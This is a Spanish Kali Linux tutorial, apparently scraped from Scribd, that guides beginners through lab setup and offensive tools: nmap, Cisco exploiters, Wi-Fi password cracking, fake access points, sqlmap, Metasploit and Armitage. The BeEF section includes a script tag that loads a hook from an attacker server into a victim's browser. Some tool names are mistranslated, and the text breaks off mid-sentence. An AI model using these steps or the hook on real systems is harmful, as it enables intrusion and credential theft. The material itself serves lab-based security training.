100% encontró este documento útil (4 votos)
2K vistas178 páginas

Aprende Kali Linux de 2021 en Español - Comprende Todas Las Herramientas y Pot

Este documento proporciona una guía paso a paso para instalar y configurar Kali Linux. Explica cómo descargar e instalar VirtualBox, luego descargar e instalar Kali Linux dentro de una máquina virtual. También cubre cómo actualizar Kali Linux y configurar una máquina de prueba para realizar pruebas de penetración con herramientas de Kali.

Cargado por

Drmoviles com
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
100% encontró este documento útil (4 votos)
2K vistas178 páginas

Aprende Kali Linux de 2021 en Español - Comprende Todas Las Herramientas y Pot

Este documento proporciona una guía paso a paso para instalar y configurar Kali Linux. Explica cómo descargar e instalar VirtualBox, luego descargar e instalar Kali Linux dentro de una máquina virtual. También cubre cómo actualizar Kali Linux y configurar una máquina de prueba para realizar pruebas de penetración con herramientas de Kali.

Cargado por

Drmoviles com
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 178

Tutorial de Kali Linux

Kali Linux es uno de los mejores paquetes de seguridad de código abierto


para un hacker ético, que contiene un conjunto de herramientas divididas por
categorías. Kali Linux se puede instalar en una máquina como un sistema
operativo, que se analiza en este tutorial. La instalación de Kali Linux es una
opción práctica, ya que brinda más opciones para trabajar y combinar las
herramientas.
Este tutorial brinda una comprensión completa de Kali Linux y explica cómo
usarlo en la práctica.

Audiencia
Este tutorial ha sido preparado para principiantes para ayudarlos a
comprender los fundamentos de Kali Linux. Será especialmente útil para los
profesionales de las pruebas de penetración. Después de completar este
tutorial, se encontrará con un nivel moderado de experiencia desde el que
podrá pasar a los siguientes niveles.

Prerrequisitos
Aunque este tutorial beneficiará a la mayoría de los principiantes,
definitivamente será una ventaja si está familiarizado con los conceptos
básicos de cualquier sistema operativo Linux.
Kali Linux: instalación y configuración
Kali Linux es uno de los mejores paquetes de seguridad de un pirata
informático ético, que contiene un conjunto de herramientas divididas por
categorías. Es un código abierto y su página web oficial
es https://www.kali.org.
Generalmente, Kali Linux se puede instalar en una máquina como un
sistema operativo, como una máquina virtual que discutiremos en la
siguiente sección. La instalación de Kali Linux es una opción práctica, ya
que brinda más opciones para trabajar y combinar las herramientas. También
puede crear un CD o USB de arranque en vivo. Todo esto se puede encontrar
en el siguiente enlace: https://www.kali.org/downloads/
BackTrack era la versión antigua de la distribución Kali Linux. La última
versión es Kali 2016.1 y se actualiza con mucha frecuencia.

Para instalar Kali Linux:


Primero, descargaremos la caja virtual y la instalaremos.
Más tarde, descargaremos e instalaremos la distribución Kali Linux.
Descarga e instala Virtual Box
Una caja virtual es particularmente útil cuando desea probar algo en Kali
Linux de lo que no está seguro. Ejecutar Kali Linux en una caja virtual es
seguro cuando desea experimentar con paquetes desconocidos o cuando
desea probar un código.
Con la ayuda de una Virtual Box, puede instalar Kali Linux en su sistema
(no directamente en su disco duro) junto con su sistema operativo principal,
que puede ser MAC o Windows u otra versión de Linux.
Entendamos cómo puede descargar e instalar Virtual Box en su sistema.
Paso 1 : para descargar, vaya
a https://www.virtualbox.org/wiki/Downloads . Dependiendo de su sistema
operativo, seleccione el paquete correcto. En este caso, será el primero para
Windows como se muestra en la siguiente captura de pantalla.

Paso 2 : haga clic en Siguiente .


Paso 3 : la siguiente página le dará opciones para elegir la ubicación donde
desea instalar la aplicación. En este caso, dejémoslo como predeterminado y
hagamos clic en Siguiente .
Paso 4 : haga clic en Siguiente y aparecerá la siguiente captura de pantalla
de configuración personalizada . Seleccione las funciones que desea
instalar y haga clic en Siguiente.
Paso 5 : haga clic en Sí para continuar con la instalación.
Paso 6 : aparece la pantalla Listo para instalar . Haga clic en Instalar.

Paso 7 : haga clic en el botón Finalizar .


La aplicación Virtual Box ahora se abrirá como se muestra en la siguiente
captura de pantalla. Ahora estamos listos para instalar el resto de los hosts de
este manual y esto también se recomienda para uso profesional.
Instalar Kali Linux
Ahora que hemos instalado con éxito Virtual Box, pasemos al siguiente paso
e instalemos Kali Linux.
Paso 1 : descargue el paquete Kali Linux de su sitio web
oficial: https://www.kali.org/downloads/

Paso 2 : haga clic en VirtualBox → Nuevo como se muestra en la siguiente


captura de pantalla.
Paso 3 : elija el archivo de disco duro virtual correcto y haga clic
en Abrir .
Paso 4 : aparece la siguiente captura de pantalla. Haga clic en
el botón Crear .

Paso 5 : inicie Kali OS. El nombre de usuario predeterminado es root y la


contraseña es toor .
Actualizar Kali
Es importante seguir actualizando Kali Linux y sus herramientas a las
nuevas versiones, para seguir siendo funcional. Los siguientes son los pasos
para actualizar Kali.
Paso 1 : vaya a Aplicación → Terminal. Luego, escriba "apt-get update" y la
actualización se llevará a cabo como se muestra en la siguiente captura de
pantalla.

Paso 2 : ahora para actualizar las herramientas, escriba "apt-get upgrade" y


se descargarán los nuevos paquetes.
Paso 3 : le preguntará si desea continuar. Escriba "Y" y "Enter" .

Paso 4 : para actualizar a una versión más reciente del sistema operativo,
escriba "apt-get distupgrade" .
Configuración de laboratorio
En esta sección, configuraremos otra máquina de prueba para realizar las
pruebas con la ayuda de herramientas de Kali Linux.
Paso 1 : descargue Metasploitable , que es una máquina Linux. Se puede
descargar desde la página web oficial
de Rapid7 : https://information.rapid7.com/metasploitabledownload.html?
LS=1631875&CS=web

Paso 2 - Regístrese proporcionando sus datos. Después de completar el


formulario anterior, podemos descargar el software.
Paso 3 : haga clic en VirtualBox → Nuevo .

Paso 4 : haga clic en "Usar un archivo de disco duro virtual


existente" . Busque el archivo donde ha descargado Metasploitable y haga
clic en Abrir .
Paso 5 : aparece una pantalla para crear una máquina virtual. Haga clic en
"Crear".

El nombre de usuario predeterminado es msfadmin y la contraseña


es msfadmin .
Kali Linux: herramientas de recopilación
de información
En este capítulo, discutiremos las herramientas de recopilación de
información de Kali Linux.
NMAP y ZenMAP
NMAP y ZenMAP son herramientas útiles para la fase de escaneo de Ethical
Hacking en Kali Linux. NMAP y ZenMAP son prácticamente la misma
herramienta, sin embargo, NMAP usa la línea de comandos mientras que
ZenMAP tiene una GUI.
NMAP es una herramienta de utilidad gratuita para el descubrimiento de
redes y la auditoría de seguridad. Muchos administradores de sistemas y
redes también lo encuentran útil para tareas como el inventario de la red, la
gestión de programas de actualización del servicio y la supervisión del
tiempo de actividad del host o del servicio.
NMAP utiliza paquetes IP sin procesar de formas novedosas para determinar
qué hosts están disponibles en la red, qué servicios (nombre y versión de la
aplicación) ofrecen esos hosts, qué sistemas operativos (y versiones de SO)
están ejecutando, qué tipo de filtros de paquetes / firewalls están en uso, etc.
Ahora, vayamos paso a paso y aprendamos a usar NMAP y ZenMAP.
Paso 1 : para abrir, vaya a Aplicaciones → 01-Recopilación de información
→ nmap o zenmap.
Paso 2 : el siguiente paso es detectar el tipo / versión del sistema operativo
del host de destino. Según la ayuda indicada por NMAP, el parámetro de
detección de tipo / versión de SO es la variable “-O”. Para obtener más
información, utilice este enlace: https://nmap.org/book/man-os-
detection.html
El comando que usaremos es:
nmap -O 192.168.1.101
La siguiente captura de pantalla muestra dónde debe escribir el comando
anterior para ver la salida de Nmap:
Paso 3 : a continuación, abra los puertos TCP y UDP. Para escanear todos
los puertos TCP basados en NMAP, use el siguiente comando:
nmap -p 1-65535 -T4 192.168.1.101
Donde el parámetro “–p” indica todos los puertos TCP que se deben
escanear. En este caso, estamos escaneando todos los puertos y “-T4” es la
velocidad de escaneo a la que tiene que ejecutarse NMAP.
A continuación se muestran los resultados. En verde están todos los puertos
abiertos TCP y en rojo están todos los puertos cerrados. Sin embargo,
NMAP no se muestra porque la lista es demasiado larga.
Escaneo sigiloso
El escaneo sigiloso o SYN también se conoce como escaneo medio
abierto , ya que no completa el protocolo de enlace de tres vías de TCP. Un
pirata informático envía un paquete SYN al objetivo; Si se recibe una trama
SYN / ACK, se asume que el objetivo completará la conexión y el puerto
está escuchando. Si se recibe un RST desde el destino, se supone que el
puerto no está activo o está cerrado.

Ahora, para ver el escaneo SYN en la práctica, use el parámetro –sS en


NMAP. A continuación se muestra el comando completo:
nmap -sS -T4 192.168.1.101
La siguiente captura de pantalla muestra cómo usar este comando:
Searchsploit
Searchsploit es una herramienta que ayuda a los usuarios de Kali Linux a
buscar directamente con la línea de comando desde el archivo de la base de
datos Exploit.
Para abrirlo, vaya a Aplicaciones → 08-Herramientas de explotación →
searchsploit, como se muestra en la siguiente captura de pantalla.

Después de abrir la terminal, escriba " searchsploit exploit index name ".
Herramientas DNS
En esta sección, aprenderemos a utilizar algunas herramientas DNS que Kali
ha incorporado. Básicamente, estas herramientas ayudan en las
transferencias de zona o en la resolución de problemas de IP de dominio.
dnsenum.pl
La primera herramienta es dnsenum.pl, que es un script PERL que ayuda a
que MX, A y otros registros se conecten a un dominio.
Haga clic en el terminal en el panel izquierdo.

Escriba "nombre de dominio dnsenum" y se mostrarán todos los


registros. En este caso, muestra registros A.
DNSMAP
La segunda herramienta es DNSMAP, que ayuda a encontrar los números de
teléfono, contactos y otros subdominios conectados a este dominio que
estamos buscando. A continuación se muestra un ejemplo.
Haga clic en el terminal como en la sección superior, luego
escriba "nombre de dominio dnsmap"
dnstracer
La tercera herramienta es dnstracer , que determina de dónde obtiene su
información un servidor de nombres de dominio (DNS) dado para un
nombre de host determinado.
Haga clic en el terminal como en la sección superior, luego
escriba "dnstracer nombre de dominio" .
Herramientas LBD
Las herramientas LBD (Load Balancing Detector) son muy interesantes ya
que detectan si un dominio determinado utiliza DNS y / o HTTP. Es
importante porque si tienes dos servidores, es posible que uno u otro no esté
actualizado y puedas intentar explotarlo. Los siguientes son los pasos para
usarlo:
Primero, haga clic en el terminal en el panel izquierdo.

Luego, escriba "lbd nombre de dominio" . Si produce un resultado como


"ENCONTRADO", significa que el servidor tiene un equilibrio de carga. En
este caso, el resultado es "NO ENCONTRADO".
Hping3
Hping3 es ampliamente utilizado por piratas informáticos éticos. Es casi
similar a las herramientas de ping, pero es más avanzado, ya que puede pasar
por alto el filtro de firewall y utilizar los protocolos TCP, UDP, ICMP y
RAW-IP. Tiene un modo de seguimiento de ruta y la capacidad de enviar
archivos entre un canal cubierto.
Haga clic en el terminal en el panel izquierdo.

Escriba “hping3 –h” que le mostrará cómo usar este comando.


El otro comando es "dominio hping3 o parámetro IP"
Kali Linux: herramientas de análisis de
vulnerabilidades
En este capítulo, aprenderemos cómo utilizar algunas de las herramientas
que nos ayudan a explotar dispositivos o aplicaciones para obtener acceso.
Herramientas de Cisco
Kali tiene algunas herramientas que pueden usarse para explotar el enrutador
Cisco. Una de esas herramientas es Cisco-Torch, que se utiliza para escaneo
masivo, toma de huellas dactilares y explotación.
Abramos la consola de Terminal haciendo clic en el panel izquierdo.

Luego, escriba “cisco-torch –parámetro IP del host” y si no se encuentra


nada que explotar, se mostrará el siguiente resultado.
Para ver cuáles son los parámetros que se pueden utilizar, escriba "cisco-
torch?"
Herramienta de auditoría de Cisco
Es un script PERL, que escanea los routers Cisco en busca de
vulnerabilidades comunes. Para usarlo, abra nuevamente la terminal en el
panel izquierdo como se muestra en la sección anterior y escriba “CAT –h
nombre de host o IP” .
Puede agregar el parámetro de puerto "-p" como se muestra en la siguiente
captura de pantalla, que en este caso es 23 para forzarlo.
Cisco Global Exploiter
Cisco Global Exploiter (CGE) es una herramienta de prueba de seguridad
avanzada, simple y rápida. Con estas herramientas, puede realizar varios
tipos de ataques como se muestra en la siguiente captura de pantalla. Sin
embargo, tenga cuidado al realizar pruebas en un entorno en vivo, ya que
algunos de ellos pueden bloquear el dispositivo de Cisco. Por ejemplo, la
opción puede detener los servicios.

Para utilizar esta herramienta, escriba "cge.pl número de dirección IP de


vulnerabilidad"
La siguiente captura de pantalla muestra el resultado de la prueba realizada
en el router Cisco para la vulnerabilidad número 3 de la lista anterior. El
resultado muestra que la vulnerabilidad se aprovechó con éxito.
CAMA
BED es un programa diseñado para verificar demonios en busca de posibles
desbordamientos de búfer, cadenas de formato, etc. Alabama.

En este caso, probaremos la máquina de pruebas con IP 192.168.1.102 y el


protocolo HTTP.
El comando será “bed –s HTTP –t 192.168.1.102” y la prueba continuará.
Kali Linux - Ataques inalámbricos
En este capítulo, aprenderemos cómo usar las herramientas de descifrado de
Wi-Fi que Kali Linux ha incorporado. Sin embargo, es importante que la
tarjeta inalámbrica que tenga admita el modo de monitoreo.
Galleta Wifi Helecho
El cracker Fern Wifi es una de las herramientas que tiene Kali para descifrar
la tecnología inalámbrica.
Antes de abrir Fern, deberíamos poner la tarjeta inalámbrica en modo
monitorización. Para hacer esto, escriba "airmon-ng start wlan-0" en la
terminal.

Ahora, abra Fern Wireless Cracker.


Paso 1 - Aplicaciones → Haga clic en “Ataques inalámbricos” → “Fern
Wireless Cracker”.
Paso 2 : seleccione la tarjeta inalámbrica como se muestra en la siguiente
captura de pantalla.
Paso 3 : haga clic en "Buscar puntos de acceso".
Paso 4 : después de finalizar el escaneo, mostrará todas las redes
inalámbricas encontradas. En este caso, solo se encontraron "redes WPA".
Paso 5 : haga clic en Redes WPA como se muestra en la captura de pantalla
anterior. Muestra todos los inalámbricos encontrados. Generalmente, en
redes WPA, realiza ataques de diccionario como tal.
Paso 6 : haga clic en "Examinar" y busque la lista de palabras que desee
utilizar para el ataque.
Paso 7 : haga clic en "Ataque Wifi".

Paso 8 : después de terminar el ataque de diccionario, encontró la contraseña


y se mostrará como se muestra en la siguiente imagen de captura de pantalla.
Kismet
Kismet es una herramienta de análisis de redes WIFI. Es un sistema de
detección de intrusos, rastreador y detector de red inalámbrica 802.11 capa
2. Funcionará con cualquier tarjeta inalámbrica que admita el modo de
monitoreo sin formato (rfmon) y pueda rastrear el tráfico 802.11a / b / g /
n. Identifica las redes recolectando paquetes y también redes ocultas.
Para usarlo, ponga la tarjeta inalámbrica en modo de monitoreo y para hacer
esto, escriba “airmon-ng start wlan-0” en el terminal.

Aprendamos a utilizar esta herramienta.


Paso 1 : para ejecutarlo, abra la terminal y escriba "kismet".
Paso 2 : haga clic en "Aceptar".

Paso 3 : haga clic en "Sí" cuando se le solicite iniciar el servidor Kismet. De


lo contrario, dejará de funcionar.
Paso 4 - Opciones de inicio, déjelo como predeterminado. Haga clic en
"Inicio".

Paso 5 : ahora mostrará una tabla que le pedirá que defina la tarjeta
inalámbrica. En tal caso, haga clic en Sí.
Paso 6 : en este caso, la fuente inalámbrica es "wlan0" . Deberá estar
escrito en la sección “Intf” → haga clic en “Agregar”.

Paso 7 : comenzará a rastrear las redes wifi como se muestra en la siguiente


captura de pantalla.
Paso 8 : haga clic en cualquier red, produce los detalles inalámbricos como
se muestra en la siguiente captura de pantalla.
GISKismet
GISKismet es una herramienta de visualización inalámbrica para representar
los datos recopilados utilizando Kismet de una manera práctica. GISKismet
almacena la información en una base de datos para que podamos consultar
datos y generar gráficos usando SQL. GISKismet actualmente usa SQLite
para la base de datos y archivos GoogleEarth / KML para graficar.
Aprendamos a utilizar esta herramienta.
Paso 1 : para abrir GISKismet, vaya a: Aplicaciones → Haga clic en
“Ataques inalámbricos” → giskismet.

Como recordará en la sección anterior, usamos la herramienta Kismet para


explorar datos sobre redes inalámbricas y todos estos paquetes de datos
Kismet en archivos netXML.
Paso 2 - Para importar este archivo a Giskismet, escriba “root @ kali: ~ #
giskismet -x Kismetfilename.netxml” y comenzará a importar los archivos.
Una vez importados, podemos importarlos a Google Earth los Hotspots que
encontramos antes.
Paso 3 - Suponiendo que ya tenemos instalado Google Earth, hacemos clic
en Archivo → Abrir archivo que creó Giskismet → Haga clic en “Abrir”.
Se mostrará el siguiente mapa.
Phisher fantasma
Ghost Phisher es una herramienta popular que ayuda a crear puntos de
acceso inalámbricos falsos y luego a crear Man-in-The-Middle-Attack.
Paso 1 : para abrirlo, haga clic en Aplicaciones → Ataques inalámbricos →
“phishing fantasma”.

Paso 2 : después de abrirlo, configuraremos el AP falso usando los


siguientes detalles.
Entrada de interfaz inalámbrica: wlan0
SSID: nombre de AP inalámbrico
Dirección IP: IP que tendrá el AP
WAP: Contraseña que tendrá este SSID para conectarse
Paso 3 : haga clic en el botón Inicio .
Wifite
Es otra herramienta inalámbrica que ataca varias redes encriptadas WEP,
WPA y WPS seguidas.
En primer lugar, la tarjeta inalámbrica debe estar en modo de
monitorización.
Paso 1 : para abrirlo, vaya a Aplicaciones → Ataque inalámbrico → Wifite.

Paso 2 : escriba "wifite –showb" para buscar las redes.


Paso 3 : para comenzar a atacar las redes inalámbricas, haga clic en Ctrl + C.

Paso 4 : escriba "1" para descifrar la primera conexión inalámbrica.

Paso 5 : después de que se complete el ataque, se encontrará la clave.


Kali Linux: pruebas de penetración de
sitios web
En este capítulo, aprenderemos sobre las pruebas de penetración de sitios
web que ofrece Kali Linux.
Uso de Vega
Vega es una plataforma de prueba y escáner de código abierto y gratuita para
probar la seguridad de las aplicaciones web. Vega puede ayudarlo a
encontrar y validar SQL Injection, Cross-Site Scripting (XSS), información
confidencial divulgada inadvertidamente y otras vulnerabilidades. Está
escrito en Java, basado en GUI y se ejecuta en Linux, OS X y Windows.
Vega incluye un escáner automatizado para pruebas rápidas y un proxy de
interceptación para inspección táctica. Vega se puede ampliar utilizando una
potente API en el lenguaje de la web: JavaScript. La página web oficial
es https://subgraph.com/vega/

Paso 1 : para abrir Vega, vaya a Aplicaciones → 03-Análisis de aplicaciones


web → Vega

Paso 2 : si no ve una aplicación en la ruta, escriba el siguiente comando.


Paso 3 : para iniciar un escaneo, haga clic en el signo "+".

Paso 4 : ingrese la URL de la página web que se escaneará. En este caso, es


una máquina metasploitable → haga clic en “Siguiente”.
Paso 5 - Marque todas las casillas de los módulos que desea
controlar. Luego, haga clic en "Siguiente".
Paso 6 : haga clic en “Siguiente” nuevamente en la siguiente captura de
pantalla.
Paso 7 : haga clic en "Finalizar".
Paso 8 : si aparece la siguiente tabla, haga clic en "Sí".
El escaneo continuará como se muestra en la siguiente captura de pantalla.

Paso 9 : después de que se completa el escaneo, en el panel de abajo a la


izquierda puede ver todos los hallazgos, que están categorizados según la
gravedad. Si hace clic en él, verá todos los detalles de las vulnerabilidades
en el panel derecho, como "Solicitud", "Discusión", "Impacto" y
"Remediación".
ZapProxy
ZAP-OWASP Zed Attack Proxy es una herramienta de prueba de
penetración integrada fácil de usar para encontrar vulnerabilidades en
aplicaciones web. Es una interfaz Java.
Paso 1 : para abrir ZapProxy, vaya a Aplicaciones → 03-Análisis de
aplicaciones web → owaspzap.

Paso 2 : haga clic en "Aceptar".


ZAP comenzará a cargarse.
Paso 3 : elija una de las opciones que se muestran en la siguiente captura de
pantalla y haga clic en "Iniciar".
La siguiente web es metasploitable con IP: 192.168.1.101
Paso 4 : ingrese la URL de la web de prueba en "URL para atacar" → haga
clic en "Atacar".
Una vez completado el escaneo, en el panel superior izquierdo verá todos los
sitios rastreados.
En el panel de la izquierda "Alertas", verá todos los resultados junto con la
descripción.
Paso 5 - Haga clic en "Araña" y verá todos los enlaces escaneados.
Uso de herramientas de base de datos
sqlmap
sqlmap es una herramienta de prueba de penetración de código abierto que
automatiza el proceso de detección y explotación de fallas de inyección SQL
y la toma de control de los servidores de bases de datos. Viene con un
potente motor de detección, muchas funciones de nicho para el mejor
probador de penetración y una amplia gama de conmutadores que van desde
la toma de huellas dactilares de la base de datos, la obtención de datos de la
base de datos, el acceso al sistema de archivos subyacente y la ejecución de
comandos en el sistema operativo a través de conexiones de banda.
Aprendamos a usar sqlmap.
Paso 1 : para abrir sqlmap, vaya a Aplicaciones → 04-Evaluación de la base
de datos → sqlmap.

La página web que tiene parámetros vulnerables a la inyección SQL es


metasploitable.
Paso 2 : para iniciar la prueba de inyección de SQL, escriba "sqlmap - u
URL de la víctima"

Paso 3 : a partir de los resultados, verá que algunas variables son


vulnerables.

sqlninja
sqlninja es una inyección SQL en Microsoft SQL Server para un acceso
completo a la GUI. sqlninja es una herramienta destinada a explotar las
vulnerabilidades de inyección de SQL en una aplicación web que utiliza
Microsoft SQL Server como back-end. Se puede encontrar información
completa sobre esta herramienta en http://sqlninja.sourceforge.net/
Paso 1 : para abrir sqlninja, vaya a Aplicaciones → 04-Evaluación de base
de datos → sqlninja.
Herramientas de escaneo CMS
WPScan
WPScan es un escáner de vulnerabilidades de WordPress de caja negra que
se puede usar para escanear instalaciones remotas de WordPress para
encontrar problemas de seguridad.
Paso 1 : para abrir WPscan, vaya a Aplicaciones → 03-Análisis de
aplicaciones web → “wpscan”.

Aparece la siguiente captura de pantalla.


Paso 2 : para escanear un sitio web en busca de vulnerabilidades,
escriba "wpscan –u URL de la página web" .
Si el escáner no está actualizado, le pedirá que lo actualice. Recomendaré
hacerlo.

Una vez que comience el escaneo, verá los resultados. En la siguiente


captura de pantalla, las vulnerabilidades se indican con una flecha roja.
Joomscan
Joomla es probablemente el CMS más utilizado debido a su
flexibilidad. Para este CMS, es un escáner Joomla. Ayudará a los
desarrolladores web y a los webmasters a identificar posibles debilidades de
seguridad en sus sitios Joomla implementados.
Paso 1 - Para abrirlo, simplemente haga clic en el panel izquierdo en la
terminal, luego "joomscan - parámetro" .
Paso 2 : para obtener ayuda para el uso, escriba "joomscan /?"

Paso 3 : para iniciar el análisis, escriba “joomscan –u URL de la víctima”.

Los resultados se mostrarán como se muestra en la siguiente captura de


pantalla.
Herramientas de escaneo SSL
TLSSLed es un script de shell de Linux que se utiliza para evaluar la
seguridad de la implementación de un servidor web SSL / TLS (HTTPS) de
destino. Se basa en sslscan, un escáner SSL / TLS completo que se basa en
la biblioteca openssl y en la herramienta de línea de comandos "openssl
s_client" .
Las pruebas actuales incluyen comprobar si el destino admite el protocolo
SSLv2, el cifrado NULL, cifrados débiles basados en la longitud de su clave
(40 o 56 bits), la disponibilidad de cifrados fuertes (como AES), si el
certificado digital está firmado MD5 y las capacidades actuales de
renegociación de SSL / TLS.
Para comenzar a probar, abra una terminal y escriba "tlssled URL
port" . Comenzará a probar el certificado para encontrar datos.

Puede ver en el hallazgo que el certificado es válido hasta 2018, como se


muestra en verde en la siguiente captura de pantalla.
w3af
w3af es un marco de auditoría y ataque de aplicaciones web que tiene como
objetivo identificar y explotar todas las vulnerabilidades de las aplicaciones
web. Este paquete proporciona una interfaz gráfica de usuario (GUI) para el
marco. Si solo desea una aplicación de línea de comandos, instale w3af-
console.
El marco se ha llamado el "metasploit para la web", pero en realidad es
mucho más, ya que también descubre las vulnerabilidades de la aplicación
web utilizando técnicas de escaneo de caja negra. El núcleo de w3af y sus
complementos están completamente escritos en Python. El proyecto cuenta
con más de 130 complementos, que identifican y explotan la inyección de
SQL, las secuencias de comandos entre sitios (XSS), la inclusión de archivos
remotos y más.
Paso 1 : para abrirlo, vaya a Aplicaciones → 03-Análisis de aplicaciones
web → Haga clic en w3af.

Paso 2 : en el "Destino" ingrese la URL de la víctima, que en este caso será


la dirección web metasploitable.
Paso 3 - Seleccione el perfil → Haga clic en "Inicio".

Paso 4 : vaya a "Resultados" y podrá ver el resultado con los detalles.


Kali Linux - Herramientas de explotación
En este capítulo, aprenderemos sobre las diversas herramientas de
explotación que ofrece Kali Linux.
Metasploit
Como mencionamos anteriormente, Metasploit es un producto de Rapid7 y
la mayoría de los recursos se pueden encontrar en su página
web www.metasploit.com . Está disponible en dos versiones: edición
comercial y gratuita. Las diferencias entre estas dos versiones no son
muchas, por lo tanto, en este caso usaremos la versión comunitaria (gratuita).
Como hacker ético, utilizará "Kali Ditribution", que tiene la versión
comunitaria de Metasploit integrada, junto con otras herramientas de
piratería ética que son muy cómodas al ahorrar tiempo de instalación. Sin
embargo, si desea instalarlo como una herramienta separada, es una
aplicación que puede instalarse en los sistemas operativos como Linux,
Windows y OS X.
Primero, abra la consola Metasploit en Kali. Luego, vaya a Aplicaciones →
Herramientas de explotación → Metasploit.

Una vez que se inicia, verá la siguiente pantalla, donde la versión de


Metasploit está subrayada en rojo.
En la consola, si usa ayuda o? símbolo, le mostrará una lista con los
comandos de MSP junto con su descripción. Puede elegir según sus
necesidades y lo que utilizará.
Otro comando de administración importante es msfupdate, que ayuda a
actualizar el metasploit con las últimas vulnerabilidades. Después de ejecutar
este comando en la consola, tendrá que esperar varios minutos hasta que se
complete la actualización.
Tiene un buen comando llamado "Buscar" que puede usar para encontrar lo
que desea, como se muestra en la siguiente captura de pantalla. Por ejemplo,
quiero encontrar exploits relacionados con Microsoft y el comando puede
ser msf> nombre de búsqueda: Microsoft type: exploit .
Donde "buscar" es el comando, "nombre" es el nombre del objeto que
estamos buscando y "tipo" es el tipo de secuencia de comandos que estamos
buscando.

Otro comando es "información". Proporciona la información sobre un


módulo o plataforma donde se utiliza, quién es el autor, referencia de
vulnerabilidad y la restricción de carga útil que puede tener.
Armitage
La GUI de Armitage para metasploit es una herramienta complementaria
para metasploit. Visualiza objetivos, recomienda exploits y expone las
funciones avanzadas posteriores a la explotación.
Vamos a abrirlo, pero en primer lugar, la consola de metasploit debería
abrirse e iniciarse. Para abrir Armitage, vaya a Aplicaciones →
Herramientas de explotación → Armitage.

Haga clic en el botón Conectar , como se muestra en la siguiente captura de


pantalla.
Cuando se abra, verá la siguiente pantalla.

Armitage es fácil de usar. El área "Objetivos" enumera todas las máquinas


que ha descubierto y con las que está trabajando, los objetivos pirateados son
de color rojo con una tormenta eléctrica sobre ellos.
Después de haber pirateado el objetivo, puede hacer clic derecho sobre él y
continuar explorando con lo que necesita hacer, como explorar (navegar) las
carpetas.

En la siguiente GUI, verá la vista de las carpetas, que se llama consola. Con
solo hacer clic en las carpetas, puede navegar por las carpetas sin la
necesidad de comandos de metasploit.
En el lado derecho de la GUI, hay una sección donde se enumeran los
módulos de vulnerabilidades.
Carne de vaca
BeEF son las siglas de Browser Exploitation Framework . Es una
herramienta de prueba de penetración que se centra en el navegador
web. BeEF permite al probador de penetración profesional evaluar la postura
de seguridad real de un entorno objetivo utilizando vectores de ataque del
lado del cliente.
Primero, debe actualizar el paquete Kali usando los siguientes comandos:
root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss
Para comenzar, use el siguiente comando:
root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef

Abra el navegador e ingrese el nombre de usuario y la contraseña: carne .


El gancho BeEF es un archivo JavaScript alojado en el servidor BeEF que
debe ejecutarse en los navegadores del cliente. Cuando lo hace, vuelve a
llamar al servidor BeEF comunicando mucha información sobre el
objetivo. También permite ejecutar comandos y módulos adicionales contra
el objetivo. En este ejemplo, la ubicación del gancho BeEF está
en http://192.168.1.101:3000/hook.js .
Para atacar un navegador, incluya el gancho de JavaScript en una página que
verá el cliente. Hay varias formas de hacerlo, sin embargo, la más fácil es
insertar lo siguiente en una página y hacer que el cliente la abra de alguna
manera.
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript">
</script>
Una vez que se cargue la página, regrese al Panel de control de BeEF y haga
clic en "Navegadores en línea" en la parte superior izquierda. Después de
unos segundos, debería ver la ventana emergente de su dirección IP que
representa un navegador conectado. Al pasar el cursor sobre la IP, se
proporcionará rápidamente información como la versión del navegador, el
sistema operativo y los complementos instalados.

Para ejecutar el comando de forma remota, haga clic en el host


"Propiedad". Luego, en el comando haga clic en el módulo que desea
ejecutar, y finalmente haga clic en "Ejecutar".
Suggester de exploits de Linux
Sugiere posibles exploits dada la versión de lanzamiento 'uname -r' del
sistema operativo Linux.
Para ejecutarlo, escriba el siguiente comando:
root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -
k 3.0.0
3.0.0 es la versión del kernel del sistema operativo Linux que queremos
explotar.
Kali Linux - Herramientas forenses
En este capítulo, aprenderemos sobre las herramientas forenses disponibles
en Kali Linux.
p0f
p0f es una herramienta que puede identificar el sistema operativo de un host
de destino simplemente examinando los paquetes capturados incluso cuando
el dispositivo en cuestión está detrás de un firewall de paquetes. P0f no
genera ningún tráfico de red adicional, directo o indirecto; sin búsquedas de
nombres; sin sondas misteriosas; sin consultas ARIN; nada. En manos de
usuarios avanzados, P0f puede detectar la presencia de firewall, el uso de
NAT y la existencia de balanceadores de carga.
Escriba "p0f - h" en la terminal para ver cómo usarlo y obtendrá los
siguientes resultados.

Enumerará incluso las interfaces disponibles.


Luego, escriba el siguiente comando: “p0f –i eth0 –p -o nombre de
archivo” .
Donde el parámetro "-i" es el nombre de la interfaz como se muestra
arriba. "-p" significa que está en modo promiscuo. "-o" significa que la
salida se guardará en un archivo.

Abra una página web con la dirección 192.168.1.2

De los resultados, puede observar que el servidor web está usando apache
2.xy el sistema operativo es Debian.
analizador pdf
pdf-parser es una herramienta que analiza un documento PDF para
identificar los elementos fundamentales utilizados en el archivo pdf
analizado. No procesará un documento PDF. No se recomienda para
estuches de libros de texto para analizadores de PDF, sin embargo, hace el
trabajo. Generalmente, esto se usa para archivos pdf que sospecha que tienen
un script incrustado.
El comando es -
pdf-parser -o 10 filepath
donde "-o" es el número de objetos.

Como puede ver en la siguiente captura de pantalla, el archivo pdf abre un


comando CMD.
Dumpzilla
La aplicación Dumpzilla está desarrollada en Python 3.xy tiene como
propósito extraer toda la información forense interesante de los navegadores
Firefox, Iceweasel y Seamonkey para ser analizada.
ddrescue
Copia datos de un archivo o dispositivo de bloque (disco duro, cdrom, etc.) a
otro, intentando rescatar primero las partes buenas en caso de errores de
lectura.
El funcionamiento básico de ddrescue es completamente automático. Es
